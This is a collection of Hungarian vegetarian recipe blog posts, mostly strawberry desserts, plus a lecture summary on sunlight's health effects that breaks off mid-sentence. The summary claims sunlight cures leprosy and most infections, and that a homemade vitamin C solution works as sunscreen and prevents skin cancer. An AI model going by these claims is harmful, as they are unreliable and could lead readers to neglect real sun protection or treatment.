Kivétel nélkül, szinte mindenki imádja ezt a finom zamatos gyümölcsöt. Vendégvárónak is tálalhatjuk ha éppen szezonja van. Mindig azt hangsúlyozom, hogy a gyümölcsöket mindig önmagukban fogyasztjuk. Mondhatni ez most a kivétel, de most sem feledkezünk el az erjedésgátló fűszerekről! Hozzávalók: 500 g friss eper 100 g étbevonó 1 evőkanál kókusz olaj késhegynyi bourbon vanília késhegynyi örőlt fahéj A csokoládét víz gőz felett felolvasztjuk, hozzáadjuk a kókusz olajat, fűszereket és egyenként belemártjuk az eper szemeket. Egy tálra fektetjük őket és hűtőben tároljuk tálalásig. Fittanyuka - lúgosító ételek a facebookon Fittanyuka
Epres pite (Tojásmentes, sok kókusszal)
Becsukom a szemem és mit látok? Epret, epret, temérdek epret. Sajnos már nagy részét csak akkor látom, ha becsukom a szemem, de szerencsére lehetőségem volt élőben is sok sok eperszemmel találkozni. Sütésnél és szedésnél is egyaránt.Még nem unom. Sőt! Nem bánnám, ha legalább olyan könnyen és minőségben hozzáférhető lenne egész évben, mint az alma. De ez nekünk Kárpát-medencei lakosoknak nem adatott meg. Igaz, nem tudom, van-e a világon olyan hely, ahol a klíma lehetővé teszi, hogy a 12 hónapból legalább 8-9 hónapon keresztül szüretelni, tárolni lehessen az epret. Persze, most azzal nyugtatom magam, hogy ha tegyük fel, létezne is ilyen hely, biztos vagyok benne, hogy ők pedig az iránt áhítoznak, hogy alma és körte teremjen náluk úgy, mint nálunk. :) Ezen elmélkedésemet nem mindig kell komolyan venni. Ugyanígy képes vagyok görögdinnye szezonban is képzelődni egy rövid ideig. Szóval eperszezon lévén nem maradhat ki néhány epres csoda. Akinek a kertjében szamóca terem (ugye az kisebb szemű), ne bánkódjon, ezeket az édes kis semmiségeket (mert hát ugye, ha befaljuk semmi nem lesz belőle...) szamócával is elkészíthetjük! A recept: Hozzávalók: - 25 dkg kókuszreszelék - 6 dl víz - 10 dkg zabpehely - 10 dkg teljes kiőrlésű liszt - 15 dkg fehér liszt - 2 evőkanál olaj (napraforgó, vagy semleges ízű) - 7-10 dkg gyümölcscukor (ki milyen édesszájú) - 1 teáskanál púpozott biocsicsóka sűrítmény - 1 púpozott kávéskanál szódabikarbóna - 30 dkg eper - egy csipet só - esetleg reszelt citromhéj Elkészítés:A 6 dl vizet felforraljuk egy csipetnyi sóval. A kókuszreszelékeket leforrázzuk a felforrt vízzel, átkeverjük, majd a következő rottyanásig a tűzön hagyjuk. Minél tovább áll a forró vízben a sok sok kókuszreszelék, annál ízletesebb kókusztejet kapunk. Ezért ezt a műveletet akár előző este is elvégezhetjük. De a sütemény összeállítását mindenképpen ezzel kezdjük. Amíg az epret konyhakész állapotba "varázsoljuk", vagyis többszörös vízben átmossuk, kicsumázzuk, legalább félbe, vagy három részre vágjuk, addig a kókusztejünk érlelődik.Ha előkészítettük az epret, és a többi hozzávalót is, akkor hozzákezdhetünk a tészta elkészítéséhez. Tekintettel arra, hogy a süteményhez amúgy is kell a kókuszreszelék, nem szükséges leszűrnünk a tejet. Ellenben érdemes összeturmixolni, hogy a kókuszreszelékek minél kisebbek legyenek. Turmixolás után egyszerűen csak hozzáadjuk a fenti sorrendben a száraz hozzávalókat, majd az olajat. Átkeverjük. Édesítjük ízlésünknek megfelelően, és mielőtt a sütőpapírral kibélelt tepsibe öntjük, hozzákeverjük a szódabikarbónát és a reszelt citromhéjat (nekem épp nem volt citromom, így kimaradt).A megtisztított, felvágott eperszemeket a massza tetejére helyezzük. Sütőben közepes lángon kb. 20 perc alatt készre sütjük. Hagyjuk szikkadni, hűlni a tepsiben egészen addig, míg langymelegre nem hűl. Utána ügyes kézmozdulattal kiemelhetjük a tepsiből, vágódeszkán felvágva tálcára tehetjük. Sajnos nincs itthon friss menta, hogy azzal díszítsem. Kellemes kis süteménykockák az eperszezon idején. Természetesen bármely más gyümölccsel elkövethetjük ezt a nagyszerű tettet.
Szuper reggeli: Mandulavajas pirítós mandulatejes kávéval
2012. június 4. Zizi kalandjai
Le sem tagadom... mandula lázban égünk. Amióta megtaláltuk a biopiacon Zabodál Imre mandula termékeit, rá vagyunk kattanva. Először a mandulatejjel ismerkedtünk meg. Korábban már vásároltam külföldi mandulatejet, amelyik teljesen fehér színű, de Imréék teje drapp színű, mert ők a mandula héját is felhasználják a tej készítésekor. Kinyitod az üveget és erősen megcsap a marcipán illat. A tej sűrűbb, mint a külföldi változat és krémesebb is. Örülök, hogy van ilyen minőségű magyar termék a piacon. Tudom, a mandulatejet én is meg tudnám csinálni, de még nem vettem rá magam. Talán hamarosan. Elkészítése egyszerű, csak mandula és víz kell hozzá. Hagyhatjuk natúran, de lehet édesíteni is. Fűszerezhetjük vaníliával, fahéjjal, de kardamommal is el tudom képzelni. Van jó néhány recept az interneten, érdemes ezek közül válogatni itt és itt. A karácsonyra vett aprító- és robotgépemmel végre tudok mandulavajat készíteni! Nagyon egyszerű. Addig kell aprítani, pörgetni a mandulát, amíg krémessé, kenhetővé válik (recept itt és itt). Csináltam is már, de csak kis mennyiségben, amikor egy adag kekszet sütöttem. Most vettünk ebből is egy üveggel Imrééktől, natúrat, édesítetlent. Kiváló pirítósra, kekszek, sütemények sütéséhez, de fogyaszthatjuk snackként is, mondjuk alma, körteszeleteket mártogatva benne. Nálunk most a mandulavaj veri a földimogyoróvajat. :) A recept nagyon egyszerű, igazából nem is recept, csak egy ötlet arra, hogy ilyet is lehet reggelizni. Mindenkinek a saját ízlésére bízom, hogyan ízesíti a pirítóst, milyen gyümölccsel eszi. Mi juharsziruppal locsoltuk meg, a gabonakávét pedig kókuszcukorral édesítettük. A kávé nagyon krémes, selymes állagú lett a mandulatejtől. Fantasztikus! Ezzel a reggelivel biztosan délig tart majd a lendület. :) Mandulavajas pirítós mandulatejes kávéval Hozzávalók 2 főre: Pirítóshoz: - néhány szelet teljeskiörlésű kenyér - mandulavaj - juharszirup / méz / rizsszirup / agavé szirup - friss eper, szeletekre vágva Kávéhoz: - 400 ml mandulatej - 4 teáskanál gabonakávé-keverék (árpa, rozs, cikória) - 2 teáskanál kókuszcukor vagy nádcukor Az elkészült pirítós szeleteket kenjük meg mandulavajjal, locsoljuk meg juharsziruppal és tegyünk rá eper szeleteket. A kávéhoz melegítsük fel a mandulatejet. Két-két teáskanál gabonakávét egy-egy teáskanál kókuszcukorral és egy kevés mandulatejjel keverjünk a bögrékben simára, majd öntsük fel a meleg tejjel.
Csokikrém eperrel
Vasárnapi meglepetés ? Hozzávalók: 2 banán pici forrásvíz 1 ek mák (elhagyható, én imádom) 2 kk bio kakaópor Botmixerrel összedolgozzuk, tálkákba tesszük, és már mehet is rá az isteni, friss eper ? Ennyi az egész. A fotóhoz pici citromfű és borsmenta levelekkel hoztam formába Kategória:édességek, Nyers ételek Tagged: banán, bio kakaópor, eper
Vegán nutella - nem lehet abbahagyni
2012. június 2. Mindennapi ételeink
A sok-sok cseresznye mellé jól illik egy kis édes bagett és házi nutella. Tegnap este készült -befőzés közben-, ma ezeket reggeliztük. Hozzávalók: 1 bögre törökmogyoró 1/2 bögre napraforgó 1,5 ek. karobpor kevés víz (kb. 1/2-1 dl, amennyit felvesz, nem mértem) 3-4 ek. nyírfacukor 1 púpos evőkanál kókuszolaj Elkészítés: A mogyorót és a napraforgómagot olaj nélküli serpenyőben megpirítjuk. Majd kávédarálón ledaráljuk. Egy edényben a karobot, a darált magokat, a vizet és a nyírfacukrot összekeverjük. Összefőzzük. Majd amikor kihűlt, hozzáadjuk a kókuszolajat. Nagyon-nagyon finom és laktató szendvicskrém. :-)
Epres-cseresznyés tejberizs-kocka
2012. május 31. Mindennapi ételeink
Hmmmm:-) Tegnap voltunk Szedd magad eperben is, ill. szüleim cseresznyefáját is alaposan megkopaszítottuk. Így a reggeli kása helyett ezt a csupa gyümölcsös finomságot ettük. Hozzávalók: 1/2 kg eper 1/2 kg cseresznye 20 dkg barna rizs kb. 1 l növényi tej 1 vanília kikapart belseje 1 citrom héja 5 dkg mazsola 5 ek. nyírfacukor 2 ek. psyllium Elkészítés: A barna rizst növényi tejjel együtt puhára főzzük. Kihűtjük. Ezután citromhéjjal, nyírfacukorral, vaníliával ízesítjük. Hozzáadjuk a gyümölcsök felét és a psylliumot. Összekeverjük. Majd egy formát bevizezünk, ebbe belesimítjuk. Tálalás előtt kiborítjuk és ráhalmozzuk a maradék gyümölcsöt. Finom reggeli édesség, de remek délutáni desszert is. Dúsíthatjuk vaníliapudinggal, vagy szójajoghurttal, ill. a tetejét tejszínnel vagy karoböntettel is.
Karalábéfőzelék
Ez az egyik zöldségféle a répa mellett, amit nyersen is szívesen fogyasztok. Még akkor is, ha nem tudnám, hogy Káliumban, A, B1, B2, B6 és C vitaminokban igen gazdag, emellett magnézium, jód szelén és foszfortartalma is jelentős. Nos, ennek a tudásnak nem voltam birtokában gyermekkoromban, amikor a dédimamám kertjében termett a finom karalábé. Már akkor nyersen is elrágcsáltam. Talán kevesen tudják, hogy antibakteriális hatással bír, így aztán légúti megbetegedések és bőrbetegségekben szenvedőknek különösen ajánlják a karalábé fogyasztását. Ezt elősegítendő egy roppant gyorsan (30 perc alatt) elkészíthető olcsó főzeléket mutatok be, amelyet lisztérzékenyek is fogyaszthatnak. A recept: Hozzávalók: - 3 közepes nagyságú (zöld héjú) karalábé - 4-5 szál zsenge karalábélevél - petrezselyem - ételízesítő - 2-3 gerezd fokhagyma - víz - 1 dl növényi tej - 2 evőkanál keményítő Elkészítés: A karalábékat meghámozzuk, felkockázzuk, majd átmossuk. A leveléből megtartunk 4-5 zsengébb szálat, felaprítjuk. Néhány szál petrezselymet is felaprítunk. A karalábékat megfőzzük annyi vízben, hogy épp egy picit ellepje. A vízbe szórunk ételízesítőt is. Amikor a karalábékockák már puhulnak, beleszórjuk a petrezselymet, a karalábéleveleket és a szétnyomott vagy felaprított fokhagymákat. Azért teszünk bele a leveléből is egy keveset, mert vas és karotinoid tartalma így nem vész kárba egészen. A növényi tejet csomómentesre keverjük a keményítővel, és amikor a karalábékockák teljesen megpuhultak, folyamatos keverés mellett a keményítős tejjel összekeverjük. Ha jól dolgoztunk besűrűsödik rövid időn belül, mint a puding. (Ha nem, még egy kevés tejet keményítővel kikeverve adhatunk hozzá.) Finom főzelék lesz belőle. Családunkban nem terjedt el annyira a karalábéfőzelék. De örülök, hogy részem lehet ebben az egészséges finomságban.
Gyógyító ételeink- zab, zabpehely
Már évek óta zabpelyhet használunk szinte minden sütemény és tésztás étel készítésekor, így úgy gondoltam, hogy igazán megérdemel egy bejegyzést. A zabot már évszázadok óta ismerjük, és előszeretettel használjuk. Anyáink, nagyanyáink zabkásán nőttek fel, majd ahogy megjelentek a müzlik és gabonapelyhek, egyre inkább feledésbe merült. Napjainkban azonban újra fénykorát éli, nagy szerencsénkre. Magas rost és vitamin tartalma igazán értékessé teszi. A benne található élelmi rostok egyik része vízben oldható, másik oldhatatlan. A vízoldékony rostoknak köszönhető, hogy a zabnak igen alacsony a glikémiás indexe, tehát képes stabilizálni a vércukorszintet. Az oldhatatlan rostok pedig a bélrendszer normál működését támogatják, segítik a méreganyagok kiürülését a szervezetből. Elősegítik a rák megelőzését. Összefoglalva, tehát: - gazdag B- és E-vitaminban (a B-vitaminok az idegrendszert támogatják, az E-vitaminnak pedig sejtvédő szerepe van) - elengedhetetlen ásványi anyagokat tartalmaz (vas, kalcium, kálium, magnézium, foszfor) - magas a fehérjetartalma (vegetáriánusok!) - lúgosító hatású Cukorbetegeknek, bőr és emésztési problémákkal küzdőknek, és stresszes életmódot folytatóknak különösen ajánlott a zab, zabpehely fogyasztása! Bátran használható bármilyen sütemény, főzelék, zöldségkrém, fasírt készítésekor. Íme néhány javaslat: http://biovilag.blogspot.com/2011/12/aszaltmeggyes-cookie.html http://biovilag.blogspot.com/2011/12/mandulas-suti.html http://biovilag.blogspot.com/2012/03/kenyer-sutobol.html Ani :)
Epres süti
2012. május 27. Gitta nyersétel blogja
Hiába no, mostanában ha édességre gondolok, mindig csak az eper jut eszembe. Almalapokból készült, felváltva csokis-epres-vaníliás rétegek között! A tetejére szintén csoki réteg került, és az oldalát is azzal vontam be. A fotózás után egy pillanat alatt elfogyott! Epres szelet Hozzávalók: 7 darab almalap (almát pépesítünk és aszalógépben megaszalunk, ha nincs aszalógéped, a légkeveréses sütő is megteszi, vagy készen is tudsz almalapot venni - ITT -) a csokis réteghez: 2 banán 15 dkg mandula 1 evőkanál méz 2 evőkanál kakaópor pici víz A mandulát megőröljük, a banánt villával szétnyomkodjuk. Kevés vízzel kikeverjük a mandulát, hozzáadjuk a banánt, mézet, kakaóport. Kenhető állagúnak kell lennie. az epres réteghez: 20 dkg friss eper Az epret vékony szeletekre vágjuk. Ne pürésítsük, mert eláztatja az almalapokat. a vaníliás réteghez: 15 dkg kesudió 1 kávéskanál vanília por 1 evőkanál méz 1 citrom kifacsart leve 1 evőkanál chia mag (vagy használhatsz más sűrítő anyagot is) kevés víz A kesudiót kevés vízzel simára turmixoljuk, hozzáadjuk a mézet, citromlét, vaníliát. Chia maggal sűrítjük. (ezzel egy órát várni kell, míg megszívja magát, és akkor kenhető állagú lesz. Használhatsz utifűmag héjt is, azzal is teljesen jó) Az első almalapra csokiréteg kerül. Szépen egyenletesen elkenjük, majd rátesszük a következő almalapot. Erre egyenletesen elterítjük az eper szeleteket. Eper szeletekkel Erre újabb almalap kerül. Most jön a vaníliás réteg: Vaníliás rétegA következő almalapra ismét csokis réteget kenünk, majd megint eper következik, és a végén újra vaníliás. A tetejét és az oldalát megkenjük csokikrémmel, és egy órára eltesszük pihenni, hogy az almalapok felpuhuljanak. Ezután lehet szeletelni, eperdarabokkal díszíteni. Tányéron :
Feledhetetlen és örök
Férjem Édesanyjának kerek évfordulóját ünnepelve egy szép tortát (is) ajándékoztunk neki. A számot nem árulom el, amúgy is azt mondják, 30 felett nem illik firtatni a kort... Különben is a képek árulkodnak az évszámról. Bár azt meg kell mondanom, hogy ha szembe jönne veled az utcán, nem gondolnád, hogy ennyi. 10-15 évvel kevesebbnek tippelnéd. Bizonyára a kerti munka is fiatalon tartja. :) A képet több szempontból is ideillőnek tartom. Egyrészt, mert receptjeim nagy részének hátterében az Ő keze munkája is ott van, hiszen a legtöbb zöldség az Ő veteményes kertjéből érkezik, s ezért nem tudunk eléggé hálásak lenni. Másrészt a Vegalife ugye két szóból tevődik össze vega, mint vegetarian=vegetáriánus és life=élet. A vegetáriánus életmódhoz meglehetősen sok zöldségre (gyümölcsre és gabonára) van szükség, amit mi elsősorban a Férjem Édesanyjától kapunk. Az élethez pedig hozzátartozik a születésnap is. Szóval mindezek után hadd szóljanak a képek magukért elsősorban a tortáról, másodsorban az évszámokkal egyenlő rózsaszálakról. Az ötletet a díjnyertes Sendula Enikő tortájából ered. Ezúton is köszönöm szépen neki a segítséget a képekkel és a lehetőséget, hogy tortájából egyfajta "remake" készüljön.
Keleti répás tészta
2012. május 25. Vegetáriánus receptek
Nem volt itthon túl sok minden, de egyébként is valami egyszerűre vágytam. Sietni is kellett, mert éhes voltam, így egy már bevált receptem mellett döntöttem. Az elnevezésén persze lehet vitatkozni. :-)
Hozzávalók:
- 25 dkg tészta,
- 3 ek olaj,
- egy hosszú chili fele kimagozva (aki csípősebben szereti, annak mehet az egész és maggal),
- 2 nagyobb fej hagyma,
- 2 hüvelykujjnyi gyömbér,
- 1,5 tk tandori masala,
- kb. 30 dkg répa,
- só, víz.
A tésztát feltesszük főni. Eközben felaprítjuk a chilit, a gyömbért és a hagymát. A sárgarépát megtisztítjuk, és nagylyukú reszelőn lereszeljük, így hamar megpirul majd.
Lehetőleg wokban készítsük el. Felforrósítjuk az olajat, picit megpirítjuk benne a chilit, majd beletesszük a hagymát és a gyömbért is. Átpároljuk épphogy üvegesre. Ez után hozzáadunk 1,5 teáskanál tandori masalát, és azzal is pirítjuk néhány másodpercig. Hozzáadjuk a répát is, megsózzuk és aláöntünk egy pici vizet. Meg-megkavarva fedő alatt pároljuk addig, amikor már nem nyers, de még ropogós.
A tésztát leszűrjük és hozzáadjuk a zöldségekhez. Alaposan átforgatjuk, hogy egyenletesen legyen a tészta közt a répa. Szójaszósszal locsolgatva átpirítjuk.
Édes a répától, friss a gyömbértől, csíp a chilitől. Bitang lett, de nagyon finom!
Bliszkó Viktor
Gyümölcsös árpa (gersli)
Az árpa fontosabb kenyérgabona volt a görögök és a rómaiak idején, mint a búza. Ezt jelzi az is, hogy a római Ceres isten árpából és nem búzából font koszorút viselt. Alacsony gluténtartalma miatt azonban az árpalisztből nem lehetett nagy cipót sütni, így végül helyébe a búza lépett. Az árpa gyógyító hatásának még napjainkban is találni nyomát, ugyanis a fogászatban gyakran alkalmazott helyi érzéstelenítő az árpa egyik alkaloidjának szintetikus változata. Az árpa jelentősége a sörgyártásban napjainkig jelen van. A gabonaszemeket először kicsíráztatják, majd a sarjadó csíranövényeket kiszárítják. Az így keletkező malátát vízzel keverik, majd élesztővel erjesztve, hordóba töltve sör készül belőle. Malátából készül a whisky is. Noha abszolút nem értek egyet az alkohol fogyasztásával, mégis érdekes információként osztottam meg. A sör és a whisky ugyan árpából készül, de egyátalán nem egészséges. Ez mutatja azt is, hogy nem mindegy, milyen technikával használjuk fel adott esetben az árpát. Máskülönben az árpa rostban gazdag táplálék, így mindenképpen a bélrendszert alaposan átmozgatja, rostjai által a bélfalakon lerakódott anyagokat tisztítja. Nem mellékes az a tény is, hogy magas magnézium, kálcium, kálium és foszfor tartalma van. Fogyasztható sós és édes ételként is. Most egy édes receptet osztok meg mindenkivel.A recept: Hozzávalók: - 25 dkg hántolt árpa - víz - 2 db körte - 2 db banán - 6-8 szem eper - 1 teáskanál biocsicsóka sűrítmény - 1 csapzott evőkanál gyümölcscukor (vagy ki mivel édesít...) - darált dió (kihagyható) Elkészítés:A hántolt árpaszemeket átmossuk, majd feltesszük főzni. A víz jól ellepje. Főzés közben tartózkodjunk a gerslitől látótávolságra, nehogy leégjen, vagy kifusson. Amikor a szemek már megpuhultak, és a víz is lefőtt róla, biocsicsóka-sűrítménnyel összekeverjük, majd hozzáadjuk a gyümölcscukrot és végül a felaprított gyümölcsöket. Díszítésként eperszemekkel díszítettem és darált dióval szórtam meg. Ez lecserélhető kókuszreszelékre is. De az általam felsorolt gyümölcsök természetesen nincsenek kőbe vésve. Téli napokon citrusfélékkel, kivivel, nyáron meggyel, cseresznyével vagy barackkal, szilvával is elkészíthető. Egy szó, mint száz fenséges - egészséges eleség reggelekre és desszertekhez. :)Tejberizs helyett inkább válasszunk gyümölcsös árpát. Jobban jár vele a szervezetünk.
Ismét az MTV 1 egyik műsorában
2012. május 21. Főzés nélkül finoman!
2012.05.20 az MTV 1 Ma reggel műsora 6:55... műsoridő: a link a megtekintéshez: rövidesen látható lesz a videótárban, egy kis türelem... a receptek :))) Fekete olívabogyó krém medvehagymával 2 személyre 200 gramm fekete olívabogyó 1 dl hidegen sajtolt extraszűz olívaolaj 10 levél medvehagyma Az olívabogyóról leöntjük a levét, majd egy erős darálóban az olívaolajjal és a megmosott leszárított (konyharuhával megtörölt) medvehagyma levelekkel együtt pépesítjük. Ha szeretjük a medvehagymát látványában is élvezni, akkor 2 levelet csak a pépesítés után rövid darálással aprítsunk hozzá, így a mélyzöld levelek nagyobb darabjai szépen kivillannak a fekete olíva közül... Az ízeket az olívabogyó sós fanyarsága és a medvehagyma csípős fokhagymára emlékeztető jellege adja. Otthon készített kenyérrel (a kenyérsütők kiválóak erre) fogyaszthatjuk. Jégsaláta paradicsommal és sárgarépával 2 személyre 1/2 fej jégsaláta 10 szem koktélparadicsom 1 db nagyobb sárgarépa 1 dl olívaolaj kevés só, rómaikömény, színes bors. A jégsalátát vékonyra szeljük, a koktélparadicsomot felezzük. A meghámozott sárgarépát, burgonyahámozóval felcsíkozzuk. Az előkészített zöldségeket megöntözzük olívaolajjal, megszórjuk kevés sóval, fűszerezzük rómaiköménnyel és durvára őrölt színes borssal, majd az egészet gyengéden átforgatjuk. Önálló ételként vagy köretként is kiváló. Amennyiben a salátából garantáltan mindenki fogyaszt, az olívaolajba 3-4 gerezd fokhagymát is préselhetünk, ezzel is megvadítva az ízlelőbimbóinkat. Mandulával szórt eper, ,,csokis epersodóval 2 személyre 1/2 kg eper 1/2 l ,,házi készítésű rizstej szeletelt mandula, 70 %-os fekete csokoládé, nádcukor, szárított menta, tisztított víz. A rizstej elkészítése roppant egyszerű. Személyenként egy evőkanál gömbölyű rizst (rövidszemű rizst, jobban pépesedik) személyenként 1 dl tisztított vízben pépesre főzünk, majd jelenesetben 3 dl tisztított vízzel, egy teáskanál olívaolajjal, csipet sóval egyetemben leturmixoljuk, és leszűrjük. A megmosott eper 2/3-t egészben vagy aprítva egy kehelybe tesszük, miközben a maradék 1/3 epret a rizstejjel, 1/4 tábla csokoládéval és egy evőkanál nádcukorral, kevés mentával együtt, tovább turmixolunk, a kész ,,sodót az eperre öntjük, és megszórjuk szeletelt mandulával. 15 percre a hűtőbe téve, tovább emelhetjük az édesség ,,értékét. Köszönöm a megtisztelő figyelmeteket! Javed
A napfény áldásai
Kedd este "A gyógyító napfény" előadáson lettünk okosabbak a napfény előnyös és hátrányos alkalmazásával kapcsolatban. Úgy gondolom, nem csak új információkra tehettem szert, hanem tévesen gondolt nézeteim is a helyükre kerültek. Az előadó egyébként Szabó Attila - Győrből érkezett, akinek néhány könyve az elmúlt években meg is jelent. Pl.: Ez a könyv, amellyel talán sokan gimnáziumi tanulmányaik során már találkoztak. Vagy egy másik könyvével. Ismét a teljesség igénye nélkül megpróbálok egy nagyobb morzsányit visszaadni az előadáson elhangzott bölcsességekből és tudományból. Az előadó azzal kezdte az előadást, hogy a Nap a Teremtő csodálatos remekműve. Olyan a föld számára, mint egy anya a gyermeke számára. A földet fenntartja és oltalmazza, irányítja, befolyásolja létével, melegével, nagyságával, megfelelő távolságával. A Nap a Földtől való mintegy 150 millió kilométer távolságával épp azokat a hőmérsékleti viszonyokat teremti meg, amelyek szükségesek ahhoz, hogy harmonikus élet legyen bolygónkon. Ha Napunk forróbb lenne, akkor a jelenlegi távolság túl kevés lenne a hősugárzás kivédéséhez és "megsülnénk". Ha viszont alacsonyabb hőfokkal rendelkezne, akkor "megfagynánk." Csak a hideg és meleg megfelelő arányú és nagyságú kombinációja vezethet optimális életfeltételhez. Az a szűk sáv, amely életet eredményez, pontosan az, amit a Nap biztosít - és éppen úgy, ahogy van. A napfény igen értékes az erős csontok kialakulásában. Mondhatjuk, hogy a napfénynek ugyanaz a hatása az egészségre, mint a testmozgásnak. Lecsökkenti a nyugalmi pulzusszámot és a légzések számát, a vércukorszintet, a tejsav mennyiségét a vérben a testgyakorlást követően. Viszont megnöveli az energiát, az erőt, tűrőképességet, stressz-toleranciát és a vér oxigénfelvevő képességét. A napfény serkenti a pajzsmirigyet, hogy növelje a hormontermelést, ami viszont megnöveli a szervezet alapanyagcseréjét, így több kalóriát éget el. Segíti a glükóz felszívódását a sejtekben, arra serkenti a szervezetet, hogy tárolásra alkalmas glykogénné alakítsa át. A napfény a növények világában is épp oly nélkülözhetetlen a fotoszintézishez. A klorofil, a növényekben található zöld részecske (pigment) képes a Nap energiáját megkötni és glükózba építve tárolni. A glükóz egyszerű cukor, az összetettebb szénhidrátoknak, a test fűtőanyagainak az építőköve, melyek az állati élethez szükséges energia javát szolgálják. A növények a napfény hatására fehérjéket, zsírokat és vitaminokat is gyártanak. Nitrogénszármazékok és a talajból származó ásványi anyagok vízzel és szénhidrátokkal egyesülnek. Így az összes táplálékul szolgáló növényt a napfénynek köszönhetjük. A napfény az az erő, ami táplálja, fenntartja, energiával látja el testünket. A napfény teremti meg a létünkhöz szükséges környezetet is. Közvetett úton oxigént és széndioxidot termel. Szabályozza a hőmérsékletet és a páratartalmat az életfenntartó szinteken. Az előadó által vázolt következő fontos téma a "napfény-vitamin" volt. Ez nem más, mint a D vitamin. A test napi D-vitamin szükséglete 400 egység. Ha arcunkat napi 15 percig napoztatjuk, akkor a napi szükségletnél máris többet nyerünk. A D vitamin nélkülözhetetlen csontrendszerünk egészséges fejlődéséhez, a megfelelő mennyiségű kálcium és foszfor csontokba történő beépüléséhez. Megelőzi a fájdalmas és torzulásokkal járó angolkórt, valamint egy súlyos felnőttkori betegséget, a csontlágyulást. A napfény D vitamint készít és von ki a koleszterinből és néhány növényi eredetű szterinből, amelyek közvetlenül a bőr alatt rakódnak le. Amikor ezt a munkát végzi, a test koleszterinjéből használ fel valamennyit. Az öregedés csökkenti a D vitamin termelést. Az öregedés rontja a szervezet képességét, hogy aktív D vitamin képleteket termeljen, ráadásul lelassítja a kálcium felszívódást a beleken keresztül, így megnöveli a hiányos csont-mineralizáció kockázatát. A legtöbb kutató úgy véli, hogy a zsírban gazdag étrend az öregedés fő előidézője. Egy 70 éves ember bőre egy 20 éves ember D vitamin termelésének kb. a felét produkálja. A napfény a csírák ellensége. 1877-ben két tudós Downs és Blunt felfedezte, hogy a napfény megöli a csírákat. Ezek a kutatók baktériumokat telepítettek néhány kísérleti kémcsőben lévő oldatba. Egészen véletlenül néhány kémcsövet napsugárzás hatásának tettek ki. Az árnyékban elhelyezkedő kémcsövekben a baktériumok növekedtek, a napfény hatásának kitett baktériumok nem. 1903-ban Niels Fensen dán orvost Nobel-díjjal jutalmazták, mivel sikerrel kezelte napfénnyel a tuberkolózist. A legtöbb fertőzés, mint torokgyulladás, tüdőgyulladás, gyermekágyi láz, sőt még a lepra is napfényterápiával gyógyítható. A napfény nem csak a gyógyításban, de a fertőzések megelőzésében is segítségünkre van. Engedjük be a fényt a lakásunkba! Húzzuk el a sötétítőket napos órákban, és ahol csak lehetséges nyissuk ki az ablakot. Ez lehetővé teszi, hogy a napfény teljes színskálája behatoljon otthonunkba és megölje, elpusztítsa a baktériumokat, vírusokat, amelyek talán már szaporodni kezdtek. A szemünkbe hatoló napsugárnak is gyógyító hatásai vannak. E mechanizmuson keresztül gyógyítható az agyalapi mirigy, a hypothalamus, a tobozmirigy, sőt az agyi idegközvetítők működése is. A bőr az első védelmi vonal a csírák és a környezetünkben található mérgek ellen. Megfelelő mennyiségű napfény kisimítja, rugalmassá teszi a bőrt, és egészséges fényt ad neki. Növeli a betegséggel és fertőzéssel szembeni ellenálló képességet is. A napbarnított bőr háromszor eredményesebb a csírák elpusztítása terén, mint a le nem barnult bőrfelület. Azonban a túl sok napfény veszéllyel is járhat és alapot teremthet a bőrrák kialakulásához. Az ismételt leégés kiszárítja és ráncossá teszi a bőrt. Egyetlen betegségcsoportot sem kezelnek olyan elterjedt módon fényterápiával, mint a bőrbetegségeket. A pörsenések, pattanások, kiütések jól reagálnak a fényre. Néhány orvos által felírt gyógyszer érzékennyé teszi a bőrt a napfényre. Tetraciklint tartalmú gyógyszert gyakran írnak fel fertőzésekre, de e gyógyszer iránti érzékenység következtében is előfordulhatnak kiütések. Az ilyen tartalmú gyógyszerek használata során óvatosan tartózkodjunk a napfényen, mert valóban kiütéseket okozhat. Kemoterápia alkalmazása során is óvatosan tartózkodjunk napfényen. Idegrendszerünk általában kedvezően reagál a napfényre. A napfény a legtöbb ember hangulatát is javítja. Ha egy napot valóban helyesen akarunk elkezdeni, időben kelljünk ki az ágyból, hogy megfigyeljük a napfelkeltét. Semmi sem szebb annál, hogy a sötétség eloszlik és egy új nap megszületésének lehetünk tanúi. Lelki élmény! A napfény megnöveli az endorfint mennyiségét, amit az agyvelő állít elő. Ez pedig jó közérzetet biztosít. Ellazít és izmainknak tartást ad. A friss levegő élettel telíti személyiségünket. A megfelelő légzés és az oxigénnek a vörösvértestekbe történő eljuttatása nem csupán az élet szempontjából lényeges. Személyiségünket is energiával tölti fel. Az agyvelőn átáramló oxigén közreműködik annak az elektromos áramnak a gerjesztésében, ami gondolkodásra képesít bennünket. Az izmokon keresztüláramló oxigén pedig a cukor elégetéséhez szükséges, hogy a termelt energia izomerőt nyújtson. A napfény egészségessé teszi a szívet. A napfény, hasonlóan a rendszeres testmozgáshoz, csökkenti az érverés szaporaságát a szív nyugalmi működésében. Csúcsformába hozza a szívizmot és megnöveli a szív kimenőteljesítményét. Így javítja a szív hatékonyságát. A vérnyomást a helyes érték felé segíti. Magas vérnyomás esetén pedig csökkenti mind a szisztolés, mind a diasztolés nyomást. Jól ismert tény, hogy a testmozgás csökkenti a vércukorszintet. A cukorbetegségben és a kórosan alacsony vércukorszint (hipoglykaemia) esetén is hajlik arra, hogy normalizálja a vércukrot. A napfény ugyanezt teszi. A nap csak akkor ráncosítja a bőrt, ha a szövetek nem telítettek a szükséges vitaminokkal. Ha a szöveteket a friss gyümölcsökből és zöldségfélékből álló étrend által C-vitamin telíti, gátolja a szabad gyökök kialakulását és az öregedést. Egy természetes napvédő, ami mindkét káros sugárzástól megvéd, könnyen elkészíthető porított C vitamin és víz 10%-os oldatából. Ennél is többet tesz: megvéd az UV-A és UV-B sugarak okozta leégés kapcsán kialakult bőrráktól és egyidejűleg az egészségtelen bőrbántalmakat is meggyógyítja, például a pszoriázist, ekcémát és az ótvart. Fontos információ az is, hogy a napfény elősegíti a bőrrákot, amikor olyan adagokban éri a bőrfelületet, ami bőrgyulladáshoz (kipirosodás) vagy leégéshez vezet. Ez akkor következik be, amikor a többszörösen telítetlen zsírok és koleszterin közvetlenül a bőr alatt oxidálódik. Tehát a bőrrák esélyei, kilátásai csökkenthetők a lesülés (még az enyhe leégés) elkerülésével is, a zsírpárnák csökkentésével, az étrend rosttartalmának növelésével, és olyan antioxidánsok fogyasztásával, mint a karotin, A vitamin, C vitamin, szelén, plusz E vitamin. Járványtani tanulmányok is jelzik, hogy a valóságban, a napfény védelmez bennünket a testben máshol előforduló rákos elváltozásoktól. A kép tartalma: USA államokban 2.000-en halnak meg a túlzott napozás okozta rákban évente. A 